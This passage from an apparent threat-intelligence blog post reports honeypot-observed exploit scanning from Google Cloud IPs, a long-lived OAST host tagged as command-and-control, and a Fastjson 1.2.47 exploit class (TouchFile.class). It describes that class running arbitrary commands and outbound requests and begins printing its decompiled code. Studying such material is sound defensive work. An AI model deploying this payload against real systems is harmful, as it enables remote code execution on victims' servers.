},[1373,25978,4606],{"class":1383},[1373,25980,4883],{"class":9173},[1373,25982,25983],{"class":9176},"Mozilla\u002F5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit\u002F605.1.15 (KHTML, like Gecko) Version\u002F9.1.2 Safari\u002F605.1.15",[1373,25985,183],{"class":9173},[1373,25987,9062],{"class":1383},[1373,25989,25990,25992,25994,25996,25998,26000,26003],{"class":1375,"line":4843},[1373,25991,19050],{"class":9152},[1373,25993,23969],{"class":9165},[1373,25995,183],{"class":9152},[1373,25997,4606],{"class":1383},[1373,25999,4883],{"class":9173},[1373,26001,26002],{"class":9176},"HTTP\u002F1.1",[1373,26004,19057],{"class":9173},[1373,26006,26007],{"class":1375,"line":4849},[1373,26008,23985],{"class":1383},[1373,26010,26011,26013,26015,26017,26019,26021,26024],{"class":1375,"line":4877},[1373,26012,23732],{"class":9152},[1373,26014,23992],{"class":9155},[1373,26016,183],{"class":9152},[1373,26018,4606],{"class":1383},[1373,26020,4883],{"class":9173},[1373,26022,26023],{"class":9176},"2025-11-18T15:59:29.982Z",[1373,26025,19057],{"class":9173},[1373,26027,26028],{"class":1375,"line":4915},[1373,26029,1855],{"class":1383},[18,26031,26032],{},"Over time, we saw more than 200 unique CVE exploitation attempts associated with this infrastructure. Most of what we observed were standard Nuclei templates. However, some of the templates were no longer part of the current Nuclei library.",[18,26034,26035,26036,26041,26042,26047,26048,26053,26054,26059],{},"For example, the attacker used the old ",[47,26037,26040],{"href":26038,"rel":26039},"https:\u002F\u002Fgithub.com\u002Fprojectdiscovery\u002Fnuclei-templates\u002Fblob\u002F60914d158a1b76783ff37fc5ccb3c911df5f0e3b\u002Fhttp\u002Fvulnerabilities\u002Fgrafana\u002Fgrafana-file-read.yaml",[51],"grafana-file-read.yaml"," template, which was ",[47,26043,26046],{"href":26044,"rel":26045},"https:\u002F\u002Fgithub.com\u002Fprojectdiscovery\u002Fnuclei-templates\u002Fpull\u002F13485\u002Ffiles#diff-8d83021f50ca178de50b370da1d5527d5a4bf355af1a336427ea711d071f14f6",[51],"removed"," from ",[47,26049,26052],{"href":26050,"rel":26051},"https:\u002F\u002Fgithub.com\u002Fprojectdiscovery\u002Fnuclei-templates",[51],"nuclei-templates"," in early October 2025. The template still appears in some third-party Nuclei-based scanners, such as ",[47,26055,26058],{"href":26056,"rel":26057},"https:\u002F\u002Fgithub.com\u002FSleepingBag945\u002Fdddd\u002Fblob\u002F4c428a7c171275bfbb5fa72c2fb4bd7b48f4ff4a\u002Fcommon\u002Fconfig\u002Fpocs\u002Fgrafana-file-read.yaml#L5",[51],"dddd",", so the presence of this older version could indicate that they are using one of these tools or that they simply have not updated their Nuclei installation.",[18,26061,26062,26063,26067],{},"Additionally, between October 12, 2025 and November 14, 2025, we observed more than 1,400 exploit attempts, targeting the canaries we had deployed in Brazil. We operate canaries across the globe, so the regional concentration stood out. ",[47,26064,24833],{"href":26065,"rel":26066},"https:\u002F\u002Fwww.abuseipdb.com\u002Fcheck\u002F35.194.0.176?page=1#report",[51]," reports show the same attacker IP addresses also being flagged in Serbia and Turkey, but in our dataset the activity was focused entirely on Brazil.",[18,26069,26070],{},"The regional nature of the attacks is notable, and so is their origin. Every source we observed came from US-based Google Cloud infrastructure.",[22,26072,26073,26080,26087,26094,26101,26108,26115],{},[25,26074,26075,26079],{},[47,26076,25778],{"href":26077,"rel":26078},"https:\u002F\u002Fconsole.vulncheck.com\u002Fip\u002F34.172.194.72",[51]," (exploit scanner)",[25,26081,26082,26079],{},[47,26083,26086],{"href":26084,"rel":26085},"https:\u002F\u002Fconsole.vulncheck.com\u002Fip\u002F35.194.0.176",[51],"35.194.0.176",[25,26088,26089,26079],{},[47,26090,26093],{"href":26091,"rel":26092},"https:\u002F\u002Fconsole.vulncheck.com\u002Fip\u002F34.133.225.171",[51],"34.133.225.171",[25,26095,26096,26079],{},[47,26097,26100],{"href":26098,"rel":26099},"https:\u002F\u002Fconsole.vulncheck.com\u002Fip\u002F34.68.101.3",[51],"34.68.101.3",[25,26102,26103,26079],{},[47,26104,26107],{"href":26105,"rel":26106},"https:\u002F\u002Fconsole.vulncheck.com\u002Fip\u002F34.42.21.27",[51],"34.42.21.27",[25,26109,26110,26079],{},[47,26111,26114],{"href":26112,"rel":26113},"https:\u002F\u002Fconsole.vulncheck.com\u002Fip\u002F34.16.7.161",[51],"34.16.7.161",[25,26116,26117,26122],{},[47,26118,26121],{"href":26119,"rel":26120},"https:\u002F\u002Fconsole.vulncheck.com\u002Fip\u002F34.136.22.26",[51],"34.136.22.26"," (OAST host)",[18,26124,26125],{},"Using Google Cloud gives the attacker practical benefits. Defenders are unlikely to block a major US cloud provider, and traffic headed toward Google networks blends easily with ordinary background communication.",[18,26127,26128,26129,26134,26135,26138,26139,26141,26142,26147,26148,26150,26151,26156,26157,26160,26161,26163],{},"This does not seem to be new behavior. ",[47,26130,26133],{"href":26131,"rel":26132},"https:\u002F\u002Furlquery.net\u002Freport\u002Fce1ea88c-92bd-47b8-afd8-a4b988b99f96",[51],"urlquery"," has reported OAST callbacks involving ",[886,26136,26137],{},"i-sh.detectors-testing.com"," at ",[886,26140,26121],{}," dating back to at least November 2024, which suggests this host has been part of someone’s scanning infrastructure for quite some time. A year-long OAST presence is rare; most opportunistic scanners churn infrastructure rapidly. CloudSEK has also mentioned detectors-testing.com in a broader ",[47,26143,26146],{"href":26144,"rel":26145},"https:\u002F\u002Fwww.cloudsek.com\u002Fblog\u002Fandroxgh0st-continues-exploitation-operators-compromise-a-us-university-for-hosting-c2-logger",[51],"writeup"," on Androxgh0st activity, although their attribution is weak. In our own telemetry, the same ",[886,26149,26121],{}," address consistently presents ",[47,26152,26155],{"href":26153,"rel":26154},"https:\u002F\u002Fgithub.com\u002Fprojectdiscovery\u002Finteractsh",[51],"Interactsh"," services across ports 80, 443, and 389, reinforcing that this system is being operated as a dedicated OAST endpoint. Our ",[47,26158,1251],{"href":1249,"rel":26159},[51]," entry for ",[886,26162,26121],{}," looks like the following:",[1354,26165,26167],{"className":22307,"code":26166,"language":22309,"meta":219,"style":219},"[\n {\n \"ip\": \"34.136.22.26\",\n \"port\": 389,\n \"ssl\": false,\n \"lastSeen\": \"2025-11-25T05:13:48.086894\",\n \"asn\": \"AS396982\",\n \"country\": \"United States\",\n \"country_code\": \"US\",\n \"city\": \"Council Bluffs\",\n \"cve\": [],\n \"matches\": [\n \"Interactsh\"\n ],\n \"hostnames\": [\n \"26.22.136.34.bc.googleusercontent.com\"\n ],\n \"type\": {\n \"id\": \"c2\",\n \"kind\": \"Attack Infrastructure\",\n \"finding\": \"command and control infrastructure\"\n },\n \"feed_ids\": [\n \"7f6bc0e7-8064-40f8-b7d4-c4ebc17cf997\"\n ],\n \"_timestamp\": \"2025-11-25T09:44:44.891435404Z\"\n },\n {\n \"ip\": \"34.136.22.26\",\n \"port\": 443,\n \"ssl\": true,\n \"lastSeen\": \"2025-11-22T22:18:34.906307\",\n \"asn\": \"AS396982\",\n \"country\": \"United States\",\n \"country_code\": \"US\",\n \"city\": \"Council Bluffs\",\n \"cve\": [],\n \"matches\": [\n \"Interactsh\"\n ],\n \"hostnames\": [\n \"26.22.136.34.bc.googleusercontent.com\"\n ],\n \"type\": {\n \"id\": \"c2\",\n \"kind\": \"Attack Infrastructure\",\n \"finding\": \"command and control infrastructure\"\n },\n \"feed_ids\": [\n \"7f6bc0e7-8064-40f8-b7d4-c4ebc17cf997\"\n ],\n \"_timestamp\": \"2025-11-25T09:45:23.971299688Z\"\n },\n {\n \"ip\": \"34.136.22.26\",\n \"port\": 25,\n \"ssl\": false,\n \"lastSeen\": \"2025-11-22T22:06:42.440830\",\n \"asn\": \"AS396982\",\n \"country\": \"United States\",\n \"country_code\": \"US\",\n \"city\": \"Council Bluffs\",\n \"cve\": [],\n \"matches\": [\n \"Interactsh\"\n ],\n \"hostnames\": [\n \"26.22.136.34.bc.googleusercontent.com\"\n ],\n \"type\": {\n \"id\": \"c2\",\n \"kind\": \"Attack Infrastructure\",\n \"finding\": \"command and control infrastructure\"\n },\n \"feed_ids\": [\n \"7f6bc0e7-8064-40f8-b7d4-c4ebc17cf997\"\n ],\n \"_timestamp\": \"2025-11-25T09:44:13.709554907Z\"\n }\n]\n",[886,26168,26169,26173,26178,26197,26213,26228,26248,26268,26287,26306,26326,26339,26353,26362,26367,26380,26389,26393,26406,26426,26446,26464,26469,26482,26491,26495,26513,26517,26521,26539,26554,26568,26587,26605,26623,26641,26659,26671,26683,26691,26695,26707,26715,26719,26731,26749,26767,26783,26787,26799,26807,26811,26828,26832,26836,26854,26869,26883,26902,26920,26938,26956,26974,26986,26998,27006,27010,27022,27030,27034,27046,27064,27082,27098,27102,27114,27122,27126,27143,27148],{"__ignoreMap":219},[1373,26170,26171],{"class":1375,"line":1376},[1373,26172,9050],{"class":1383},[1373,26174,26175],{"class":1375,"line":220},[1373,26176,26177],{"class":1383}," {\n",[1373,26179,26180,26182,26185,26187,26189,26191,26193,26195],{"class":1375,"line":1266},[1373,26181,19050],{"class":9152},[1373,26183,26184],{"class":9155},"ip",[1373,26186,183],{"class":9152},[1373,26188,4606],{"class":1383},[1373,26190,4883],{"class":9173},[1373,26192,26121],{"class":9176},[1373,26194,183],{"class":9173},[1373,26196,9062],{"class":1383},[1373,26198,26199,26201,26204,26206,26208,26211],{"class":1375,"line":1852},[1373,26200,19050],{"class":9152},[1373,26202,26203],{"class":9155},"port",[1373,26205,183],{"class":9152},[1373,26207,4606],{"class":1383},[1373,26209,26210],{"class":5467}," 389",[1373,26212,9062],{"class":1383},[1373,26214,26215,26217,26220,26222,26224,26226],{"class":1375,"line":4692},[1373,26216,19050],{"class":9152},[1373,26218,26219],{"class":9155},"ssl",[1373,26221,183],{"class":9152},[1373,26223,4606],{"class":1383},[1373,26225,16311],{"class":7054},[1373,26227,9062],{"class":1383},[1373,26229,26230,26232,26235,26237,26239,26241,26244,26246],{"class":1375,"line":4724},[1373,26231,19050],{"class":9152},[1373,26233,26234],{"class":9155},"lastSeen",[1373,26236,183],{"class":9152},[1373,26238,4606],{"class":1383},[1373,26240,4883],{"class":9173},[1373,26242,26243],{"class":9176},"2025-11-25T05:13:48.086894",[1373,26245,183],{"class":9173},[1373,26247,9062],{"class":1383},[1373,26249,26250,26252,26255,26257,26259,26261,26264,26266],{"class":1375,"line":4756},[1373,26251,19050],{"class":9152},[1373,26253,26254],{"class":9155},"asn",[1373,26256,183],{"class":9152},[1373,26258,4606],{"class":1383},[1373,26260,4883],{"class":9173},[1373,26262,26263],{"class":9176},"AS396982",[1373,26265,183],{"class":9173},[1373,26267,9062],{"class":1383},[1373,26269,26270,26272,26275,26277,26279,26281,26283,26285],{"class":1375,"line":4768},[1373,26271,19050],{"class":9152},[1373,26273,26274],{"class":9155},"country",[1373,26276,183],{"class":9152},[1373,26278,4606],{"class":1383},[1373,26280,4883],{"class":9173},[1373,26282,1494],{"class":9176},[1373,26284,183],{"class":9173},[1373,26286,9062],{"class":1383},[1373,26288,26289,26291,26294,26296,26298,26300,26302,26304],{"class":1375,"line":4792},[1373,26290,19050],{"class":9152},[1373,26292,26293],{"class":9155},"country_code",[1373,26295,183],{"class":9152},[1373,26297,4606],{"class":1383},[1373,26299,4883],{"class":9173},[1373,26301,23799],{"class":9176},[1373,26303,183],{"class":9173},[1373,26305,9062],{"class":1383},[1373,26307,26308,26310,26313,26315,26317,26319,26322,26324],{"class":1375,"line":4798},[1373,26309,19050],{"class":9152},[1373,26311,26312],{"class":9155},"city",[1373,26314,183],{"class":9152},[1373,26316,4606],{"class":1383},[1373,26318,4883],{"class":9173},[1373,26320,26321],{"class":9176},"Council Bluffs",[1373,26323,183],{"class":9173},[1373,26325,9062],{"class":1383},[1373,26327,26328,26330,26332,26334,26336],{"class":1375,"line":4806},[1373,26329,19050],{"class":9152},[1373,26331,242],{"class":9155},[1373,26333,183],{"class":9152},[1373,26335,4606],{"class":1383},[1373,26337,26338],{"class":1383}," [],\n",[1373,26340,26341,26343,26346,26348,26350],{"class":1375,"line":4817},[1373,26342,19050],{"class":9152},[1373,26344,26345],{"class":9155},"matches",[1373,26347,183],{"class":9152},[1373,26349,4606],{"class":1383},[1373,26351,26352],{"class":1383}," [\n",[1373,26354,26355,26358,26360],{"class":1375,"line":4825},[1373,26356,26357],{"class":9173}," \"",[1373,26359,26155],{"class":9176},[1373,26361,19057],{"class":9173},[1373,26363,26364],{"class":1375,"line":4835},[1373,26365,26366],{"class":1383}," ],\n",[1373,26368,26369,26371,26374,26376,26378],{"class":1375,"line":4843},[1373,26370,19050],{"class":9152},[1373,26372,26373],{"class":9155},"hostnames",[1373,26375,183],{"class":9152},[1373,26377,4606],{"class":1383},[1373,26379,26352],{"class":1383},[1373,26381,26382,26384,26387],{"class":1375,"line":4849},[1373,26383,26357],{"class":9173},[1373,26385,26386],{"class":9176},"26.22.136.34.bc.googleusercontent.com",[1373,26388,19057],{"class":9173},[1373,26390,26391],{"class":1375,"line":4877},[1373,26392,26366],{"class":1383},[1373,26394,26395,26397,26400,26402,26404],{"class":1375,"line":4915},[1373,26396,19050],{"class":9152},[1373,26398,26399],{"class":9155},"type",[1373,26401,183],{"class":9152},[1373,26403,4606],{"class":1383},[1373,26405,4765],{"class":1383},[1373,26407,26408,26410,26413,26415,26417,26419,26422,26424],{"class":1375,"line":4931},[1373,26409,26357],{"class":9152},[1373,26411,26412],{"class":9165},"id",[1373,26414,183],{"class":9152},[1373,26416,4606],{"class":1383},[1373,26418,4883],{"class":9173},[1373,26420,26421],{"class":9176},"c2",[1373,26423,183],{"class":9173},[1373,26425,9062],{"class":1383},[1373,26427,26428,26430,26433,26435,26437,26439,26442,26444],{"class":1375,"line":4947},[1373,26429,26357],{"class":9152},[1373,26431,26432],{"class":9165},"kind",[1373,26434,183],{"class":9152},[1373,26436,4606],{"class":1383},[1373,26438,4883],{"class":9173},[1373,26440,26441],{"class":9176},"Attack Infrastructure",[1373,26443,183],{"class":9173},[1373,26445,9062],{"class":1383},[1373,26447,26448,26450,26453,26455,26457,26459,26462],{"class":1375,"line":4952},[1373,26449,26357],{"class":9152},[1373,26451,26452],{"class":9165},"finding",[1373,26454,183],{"class":9152},[1373,26456,4606],{"class":1383},[1373,26458,4883],{"class":9173},[1373,26460,26461],{"class":9176},"command and control infrastructure",[1373,26463,19057],{"class":9173},[1373,26465,26466],{"class":1375,"line":6776},[1373,26467,26468],{"class":1383}," },\n",[1373,26470,26471,26473,26476,26478,26480],{"class":1375,"line":6781},[1373,26472,19050],{"class":9152},[1373,26474,26475],{"class":9155},"feed_ids",[1373,26477,183],{"class":9152},[1373,26479,4606],{"class":1383},[1373,26481,26352],{"class":1383},[1373,26483,26484,26486,26489],{"class":1375,"line":7524},[1373,26485,26357],{"class":9173},[1373,26487,26488],{"class":9176},"7f6bc0e7-8064-40f8-b7d4-c4ebc17cf997",[1373,26490,19057],{"class":9173},[1373,26492,26493],{"class":1375,"line":7530},[1373,26494,26366],{"class":1383},[1373,26496,26497,26499,26502,26504,26506,26508,26511],{"class":1375,"line":7546},[1373,26498,19050],{"class":9152},[1373,26500,26501],{"class":9155},"_timestamp",[1373,26503,183],{"class":9152},[1373,26505,4606],{"class":1383},[1373,26507,4883],{"class":9173},[1373,26509,26510],{"class":9176},"2025-11-25T09:44:44.891435404Z",[1373,26512,19057],{"class":9173},[1373,26514,26515],{"class":1375,"line":7571},[1373,26516,23985],{"class":1383},[1373,26518,26519],{"class":1375,"line":7598},[1373,26520,26177],{"class":1383},[1373,26522,26523,26525,26527,26529,26531,26533,26535,26537],{"class":1375,"line":7615},[1373,26524,19050],{"class":9152},[1373,26526,26184],{"class":9155},[1373,26528,183],{"class":9152},[1373,26530,4606],{"class":1383},[1373,26532,4883],{"class":9173},[1373,26534,26121],{"class":9176},[1373,26536,183],{"class":9173},[1373,26538,9062],{"class":1383},[1373,26540,26541,26543,26545,26547,26549,26552],{"class":1375,"line":7635},[1373,26542,19050],{"class":9152},[1373,26544,26203],{"class":9155},[1373,26546,183],{"class":9152},[1373,26548,4606],{"class":1383},[1373,26550,26551],{"class":5467}," 443",[1373,26553,9062],{"class":1383},[1373,26555,26556,26558,26560,26562,26564,26566],{"class":1375,"line":7640},[1373,26557,19050],{"class":9152},[1373,26559,26219],{"class":9155},[1373,26561,183],{"class":9152},[1373,26563,4606],{"class":1383},[1373,26565,14986],{"class":7054},[1373,26567,9062],{"class":1383},[1373,26569,26570,26572,26574,26576,26578,26580,26583,26585],{"class":1375,"line":7648},[1373,26571,19050],{"class":9152},[1373,26573,26234],{"class":9155},[1373,26575,183],{"class":9152},[1373,26577,4606],{"class":1383},[1373,26579,4883],{"class":9173},[1373,26581,26582],{"class":9176},"2025-11-22T22:18:34.906307",[1373,26584,183],{"class":9173},[1373,26586,9062],{"class":1383},[1373,26588,26589,26591,26593,26595,26597,26599,26601,26603],{"class":1375,"line":7672},[1373,26590,19050],{"class":9152},[1373,26592,26254],{"class":9155},[1373,26594,183],{"class":9152},[1373,26596,4606],{"class":1383},[1373,26598,4883],{"class":9173},[1373,26600,26263],{"class":9176},[1373,26602,183],{"class":9173},[1373,26604,9062],{"class":1383},[1373,26606,26607,26609,26611,26613,26615,26617,26619,26621],{"class":1375,"line":7688},[1373,26608,19050],{"class":9152},[1373,26610,26274],{"class":9155},[1373,26612,183],{"class":9152},[1373,26614,4606],{"class":1383},[1373,26616,4883],{"class":9173},[1373,26618,1494],{"class":9176},[1373,26620,183],{"class":9173},[1373,26622,9062],{"class":1383},[1373,26624,26625,26627,26629,26631,26633,26635,26637,26639],{"class":1375,"line":7709},[1373,26626,19050],{"class":9152},[1373,26628,26293],{"class":9155},[1373,26630,183],{"class":9152},[1373,26632,4606],{"class":1383},[1373,26634,4883],{"class":9173},[1373,26636,23799],{"class":9176},[1373,26638,183],{"class":9173},[1373,26640,9062],{"class":1383},[1373,26642,26643,26645,26647,26649,26651,26653,26655,26657],{"class":1375,"line":7714},[1373,26644,19050],{"class":9152},[1373,26646,26312],{"class":9155},[1373,26648,183],{"class":9152},[1373,26650,4606],{"class":1383},[1373,26652,4883],{"class":9173},[1373,26654,26321],{"class":9176},[1373,26656,183],{"class":9173},[1373,26658,9062],{"class":1383},[1373,26660,26661,26663,26665,26667,26669],{"class":1375,"line":7722},[1373,26662,19050],{"class":9152},[1373,26664,242],{"class":9155},[1373,26666,183],{"class":9152},[1373,26668,4606],{"class":1383},[1373,26670,26338],{"class":1383},[1373,26672,26673,26675,26677,26679,26681],{"class":1375,"line":9903},[1373,26674,19050],{"class":9152},[1373,26676,26345],{"class":9155},[1373,26678,183],{"class":9152},[1373,26680,4606],{"class":1383},[1373,26682,26352],{"class":1383},[1373,26684,26685,26687,26689],{"class":1375,"line":9908},[1373,26686,26357],{"class":9173},[1373,26688,26155],{"class":9176},[1373,26690,19057],{"class":9173},[1373,26692,26693],{"class":1375,"line":9913},[1373,26694,26366],{"class":1383},[1373,26696,26697,26699,26701,26703,26705],{"class":1375,"line":9932},[1373,26698,19050],{"class":9152},[1373,26700,26373],{"class":9155},[1373,26702,183],{"class":9152},[1373,26704,4606],{"class":1383},[1373,26706,26352],{"class":1383},[1373,26708,26709,26711,26713],{"class":1375,"line":9937},[1373,26710,26357],{"class":9173},[1373,26712,26386],{"class":9176},[1373,26714,19057],{"class":9173},[1373,26716,26717],{"class":1375,"line":9957},[1373,26718,26366],{"class":1383},[1373,26720,26721,26723,26725,26727,26729],{"class":1375,"line":9962},[1373,26722,19050],{"class":9152},[1373,26724,26399],{"class":9155},[1373,26726,183],{"class":9152},[1373,26728,4606],{"class":1383},[1373,26730,4765],{"class":1383},[1373,26732,26733,26735,26737,26739,26741,26743,26745,26747],{"class":1375,"line":15955},[1373,26734,26357],{"class":9152},[1373,26736,26412],{"class":9165},[1373,26738,183],{"class":9152},[1373,26740,4606],{"class":1383},[1373,26742,4883],{"class":9173},[1373,26744,26421],{"class":9176},[1373,26746,183],{"class":9173},[1373,26748,9062],{"class":1383},[1373,26750,26751,26753,26755,26757,26759,26761,26763,26765],{"class":1375,"line":16030},[1373,26752,26357],{"class":9152},[1373,26754,26432],{"class":9165},[1373,26756,183],{"class":9152},[1373,26758,4606],{"class":1383},[1373,26760,4883],{"class":9173},[1373,26762,26441],{"class":9176},[1373,26764,183],{"class":9173},[1373,26766,9062],{"class":1383},[1373,26768,26769,26771,26773,26775,26777,26779,26781],{"class":1375,"line":16035},[1373,26770,26357],{"class":9152},[1373,26772,26452],{"class":9165},[1373,26774,183],{"class":9152},[1373,26776,4606],{"class":1383},[1373,26778,4883],{"class":9173},[1373,26780,26461],{"class":9176},[1373,26782,19057],{"class":9173},[1373,26784,26785],{"class":1375,"line":16083},[1373,26786,26468],{"class":1383},[1373,26788,26789,26791,26793,26795,26797],{"class":1375,"line":16098},[1373,26790,19050],{"class":9152},[1373,26792,26475],{"class":9155},[1373,26794,183],{"class":9152},[1373,26796,4606],{"class":1383},[1373,26798,26352],{"class":1383},[1373,26800,26801,26803,26805],{"class":1375,"line":16103},[1373,26802,26357],{"class":9173},[1373,26804,26488],{"class":9176},[1373,26806,19057],{"class":9173},[1373,26808,26809],{"class":1375,"line":16147},[1373,26810,26366],{"class":1383},[1373,26812,26813,26815,26817,26819,26821,26823,26826],{"class":1375,"line":16153},[1373,26814,19050],{"class":9152},[1373,26816,26501],{"class":9155},[1373,26818,183],{"class":9152},[1373,26820,4606],{"class":1383},[1373,26822,4883],{"class":9173},[1373,26824,26825],{"class":9176},"2025-11-25T09:45:23.971299688Z",[1373,26827,19057],{"class":9173},[1373,26829,26830],{"class":1375,"line":16164},[1373,26831,23985],{"class":1383},[1373,26833,26834],{"class":1375,"line":16170},[1373,26835,26177],{"class":1383},[1373,26837,26838,26840,26842,26844,26846,26848,26850,26852],{"class":1375,"line":16187},[1373,26839,19050],{"class":9152},[1373,26841,26184],{"class":9155},[1373,26843,183],{"class":9152},[1373,26845,4606],{"class":1383},[1373,26847,4883],{"class":9173},[1373,26849,26121],{"class":9176},[1373,26851,183],{"class":9173},[1373,26853,9062],{"class":1383},[1373,26855,26856,26858,26860,26862,26864,26867],{"class":1375,"line":16198},[1373,26857,19050],{"class":9152},[1373,26859,26203],{"class":9155},[1373,26861,183],{"class":9152},[1373,26863,4606],{"class":1383},[1373,26865,26866],{"class":5467}," 25",[1373,26868,9062],{"class":1383},[1373,26870,26871,26873,26875,26877,26879,26881],{"class":1375,"line":16204},[1373,26872,19050],{"class":9152},[1373,26874,26219],{"class":9155},[1373,26876,183],{"class":9152},[1373,26878,4606],{"class":1383},[1373,26880,16311],{"class":7054},[1373,26882,9062],{"class":1383},[1373,26884,26885,26887,26889,26891,26893,26895,26898,26900],{"class":1375,"line":16210},[1373,26886,19050],{"class":9152},[1373,26888,26234],{"class":9155},[1373,26890,183],{"class":9152},[1373,26892,4606],{"class":1383},[1373,26894,4883],{"class":9173},[1373,26896,26897],{"class":9176},"2025-11-22T22:06:42.440830",[1373,26899,183],{"class":9173},[1373,26901,9062],{"class":1383},[1373,26903,26904,26906,26908,26910,26912,26914,26916,26918],{"class":1375,"line":16254},[1373,26905,19050],{"class":9152},[1373,26907,26254],{"class":9155},[1373,26909,183],{"class":9152},[1373,26911,4606],{"class":1383},[1373,26913,4883],{"class":9173},[1373,26915,26263],{"class":9176},[1373,26917,183],{"class":9173},[1373,26919,9062],{"class":1383},[1373,26921,26922,26924,26926,26928,26930,26932,26934,26936],{"class":1375,"line":18499},[1373,26923,19050],{"class":9152},[1373,26925,26274],{"class":9155},[1373,26927,183],{"class":9152},[1373,26929,4606],{"class":1383},[1373,26931,4883],{"class":9173},[1373,26933,1494],{"class":9176},[1373,26935,183],{"class":9173},[1373,26937,9062],{"class":1383},[1373,26939,26940,26942,26944,26946,26948,26950,26952,26954],{"class":1375,"line":18504},[1373,26941,19050],{"class":9152},[1373,26943,26293],{"class":9155},[1373,26945,183],{"class":9152},[1373,26947,4606],{"class":1383},[1373,26949,4883],{"class":9173},[1373,26951,23799],{"class":9176},[1373,26953,183],{"class":9173},[1373,26955,9062],{"class":1383},[1373,26957,26958,26960,26962,26964,26966,26968,26970,26972],{"class":1375,"line":18517},[1373,26959,19050],{"class":9152},[1373,26961,26312],{"class":9155},[1373,26963,183],{"class":9152},[1373,26965,4606],{"class":1383},[1373,26967,4883],{"class":9173},[1373,26969,26321],{"class":9176},[1373,26971,183],{"class":9173},[1373,26973,9062],{"class":1383},[1373,26975,26976,26978,26980,26982,26984],{"class":1375,"line":18529},[1373,26977,19050],{"class":9152},[1373,26979,242],{"class":9155},[1373,26981,183],{"class":9152},[1373,26983,4606],{"class":1383},[1373,26985,26338],{"class":1383},[1373,26987,26988,26990,26992,26994,26996],{"class":1375,"line":18541},[1373,26989,19050],{"class":9152},[1373,26991,26345],{"class":9155},[1373,26993,183],{"class":9152},[1373,26995,4606],{"class":1383},[1373,26997,26352],{"class":1383},[1373,26999,27000,27002,27004],{"class":1375,"line":18562},[1373,27001,26357],{"class":9173},[1373,27003,26155],{"class":9176},[1373,27005,19057],{"class":9173},[1373,27007,27008],{"class":1375,"line":18578},[1373,27009,26366],{"class":1383},[1373,27011,27012,27014,27016,27018,27020],{"class":1375,"line":18583},[1373,27013,19050],{"class":9152},[1373,27015,26373],{"class":9155},[1373,27017,183],{"class":9152},[1373,27019,4606],{"class":1383},[1373,27021,26352],{"class":1383},[1373,27023,27024,27026,27028],{"class":1375,"line":18600},[1373,27025,26357],{"class":9173},[1373,27027,26386],{"class":9176},[1373,27029,19057],{"class":9173},[1373,27031,27032],{"class":1375,"line":18605},[1373,27033,26366],{"class":1383},[1373,27035,27036,27038,27040,27042,27044],{"class":1375,"line":18630},[1373,27037,19050],{"class":9152},[1373,27039,26399],{"class":9155},[1373,27041,183],{"class":9152},[1373,27043,4606],{"class":1383},[1373,27045,4765],{"class":1383},[1373,27047,27048,27050,27052,27054,27056,27058,27060,27062],{"class":1375,"line":18651},[1373,27049,26357],{"class":9152},[1373,27051,26412],{"class":9165},[1373,27053,183],{"class":9152},[1373,27055,4606],{"class":1383},[1373,27057,4883],{"class":9173},[1373,27059,26421],{"class":9176},[1373,27061,183],{"class":9173},[1373,27063,9062],{"class":1383},[1373,27065,27066,27068,27070,27072,27074,27076,27078,27080],{"class":1375,"line":18674},[1373,27067,26357],{"class":9152},[1373,27069,26432],{"class":9165},[1373,27071,183],{"class":9152},[1373,27073,4606],{"class":1383},[1373,27075,4883],{"class":9173},[1373,27077,26441],{"class":9176},[1373,27079,183],{"class":9173},[1373,27081,9062],{"class":1383},[1373,27083,27084,27086,27088,27090,27092,27094,27096],{"class":1375,"line":18694},[1373,27085,26357],{"class":9152},[1373,27087,26452],{"class":9165},[1373,27089,183],{"class":9152},[1373,27091,4606],{"class":1383},[1373,27093,4883],{"class":9173},[1373,27095,26461],{"class":9176},[1373,27097,19057],{"class":9173},[1373,27099,27100],{"class":1375,"line":18720},[1373,27101,26468],{"class":1383},[1373,27103,27104,27106,27108,27110,27112],{"class":1375,"line":18737},[1373,27105,19050],{"class":9152},[1373,27107,26475],{"class":9155},[1373,27109,183],{"class":9152},[1373,27111,4606],{"class":1383},[1373,27113,26352],{"class":1383},[1373,27115,27116,27118,27120],{"class":1375,"line":18757},[1373,27117,26357],{"class":9173},[1373,27119,26488],{"class":9176},[1373,27121,19057],{"class":9173},[1373,27123,27124],{"class":1375,"line":18773},[1373,27125,26366],{"class":1383},[1373,27127,27128,27130,27132,27134,27136,27138,27141],{"class":1375,"line":18778},[1373,27129,19050],{"class":9152},[1373,27131,26501],{"class":9155},[1373,27133,183],{"class":9152},[1373,27135,4606],{"class":1383},[1373,27137,4883],{"class":9173},[1373,27139,27140],{"class":9176},"2025-11-25T09:44:13.709554907Z",[1373,27142,19057],{"class":9173},[1373,27144,27145],{"class":1375,"line":18790},[1373,27146,27147],{"class":1383}," }\n",[1373,27149,27150],{"class":1375,"line":18795},[1373,27151,7103],{"class":1383},[18,27153,27154,27155,27157],{},"Although ",[886,27156,26137],{}," behaves like a standard OAST endpoint, it also exposes additional material that gives more insight into the actor’s tooling. In particular, an open directory on port 9000 hosts a Java class file associated with Fastjson 1.2.47 exploitation (not tied to a specific CVE, but we are working to resolve that).",[18,27159,27160],{},[68,27161],{":width":10862,"alt":27162,"src":27163},"Open directory","\u002Fblog\u002Fmystery-oast\u002Fopendir.png",[18,27165,27166,27167,27172,27173,27178,27179,27182,27183,27185,27186,27188],{},"The file, ",[47,27168,27171],{"href":27169,"rel":27170},"https:\u002F\u002Fwww.virustotal.com\u002Fgui\u002Ffile\u002F98d6d3e76949d8357a769fc01c3aa6a8db4d0ee55bb1715a0b8ba0fb3498768e\u002Fdetails",[51],"TouchFile.class",", is documented in Vulhub’s Fastjson 1.2.47 exploitation ",[47,27174,27177],{"href":27175,"rel":27176},"https:\u002F\u002Fgithub.com\u002Fvulhub\u002Fvulhub\u002Ftree\u002Fmaster\u002Ffastjson\u002F1.2.47-rce#vulnerability-reproduction",[51],"example",", but the Vulhub version is short and only touches a file. This attacker’s implementation keeps the same default behavior (",[886,27180,27181],{},"touch \u002Ftmp\u002Fsuccess3125",") but extends it. If no parameters are provided, it runs the default command. If ",[886,27184,17653],{}," parameters are present, it executes those commands instead, and if ",[886,27187,6277],{}," parameters are present, it makes outbound HTTP requests to those URLs.",[18,27190,27191],{},"A trimmed version of the decompiled class looks like this:",[1354,27193,27197],{"className":27194,"code":27195,"language":27196,"meta":219,"style":219},"language-java shiki shiki-themes material-theme-lighter github-light github-dark monokai","public class TouchFile {\n static {\n try {\n String defaultCmd = \"touch \u002Ftmp\u002Fsuccess3125\";\n List \u003C String > cmds = new ArrayList \u003C > ();\n List \u003C String > urls = new 